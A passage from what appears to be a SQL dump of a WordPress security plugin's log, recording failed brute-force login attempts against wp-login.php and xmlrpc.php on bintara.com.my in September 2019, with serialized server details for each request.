Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"60118\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBOuNVIJ66zPtjtaf3z0gAAAVQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689848.1789\";s:12:\"REQUEST_TIME\";s:10:\"1568689848\";}}','notice','2019-09-17 03:10:49','2019-09-17 03:10:48',18256848,19556928,'https://bintara.com.my/xmlrpc.php',1,0,'35.188.77.30'),(24365,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"55138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBPSR@uZ4OC5N1Fn8E6eQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689993.8492\";s:12:\"REQUEST_TIME\";s:10:\"1568689993\";}}','notice','2019-09-17 03:13:15','2019-09-17 03:13:14',17744376,19231688,'https://bintara.com.my/wp-login.php',1,0,'185.9.147.200'),(24366,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"55138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBPSR@uZ4OC5N1Fn8E6eQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689993.8492\";s:12:\"REQUEST_TIME\";s:10:\"1568689993\";}}','notice','2019-09-17 03:13:15','2019-09-17 03:13:14',17906208,19231688,'https://bintara.com.my/wp-login.php',1,0,'185.9.147.200'),(24367,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"55722\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBPTQ99C9j9bhK9KplEFwAAAQY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568689997.197\";s:12:\"REQUEST_TIME\";s:10:\"1568689997\";}}','notice','2019-09-17 03:13:19','2019-09-17 03:13:17',18256536,19554744,'https://bintara.com.my/xmlrpc.php',1,0,'185.9.147.200'),(24368,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"54712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBSU7Ip53uPsY7BKArMAgAAAEA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568690772.0539\";s:12:\"REQUEST_TIME\";s:10:\"1568690772\";}}','notice','2019-09-17 03:26:13','2019-09-17 03:26:12',17739808,19229952,'https://bintara.com.my/wp-login.php',1,0,'185.9.147.200'),(24369,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"55262\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBSVmkPXSyJlCUJQmpdywAAAYI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568690775.0204\";s:12:\"REQUEST_TIME\";s:10:\"1568690775\";}}','notice','2019-09-17 03:26:16','2019-09-17 03:26:15',18256408,19555696,'https://bintara.com.my/xmlrpc.php',1,0,'185.9.147.200'),(24370,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"37980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBU19K-omY048@iBsMpkQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568691416.0617\";s:12:\"REQUEST_TIME\";s:10:\"1568691416\";}}','notice','2019-09-17 03:36:57','2019-09-17 03:36:56',17740400,19231192,'https://bintara.com.my/wp-login.php',1,0,'148.66.133.15'),(24371,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"38338\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBU2h@uZ4OC5N1Fn8E7igAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568691418.4193\";s:12:\"REQUEST_TIME\";s:10:\"1568691418\";}}','notice','2019-09-17 03:37:00','2019-09-17 03:36:59',18256408,19555696,'https://bintara.com.my/xmlrpc.php',1,0,'148.66.133.15'),(24372,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.72.200\";s:11:\"REMOTE_PORT\";s:5:\"49974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBWINVIJ66zPtjtaf32kAAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568691744.7672\";s:12:\"REQUEST_TIME\";s:10:\"1568691744\";}}','notice','2019-09-17 03:42:26','2019-09-17 03:42:25',17740184,19230080,'https://bintara.com.my/wp-login.php',1,0,'144.217.72.200'),(24373,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 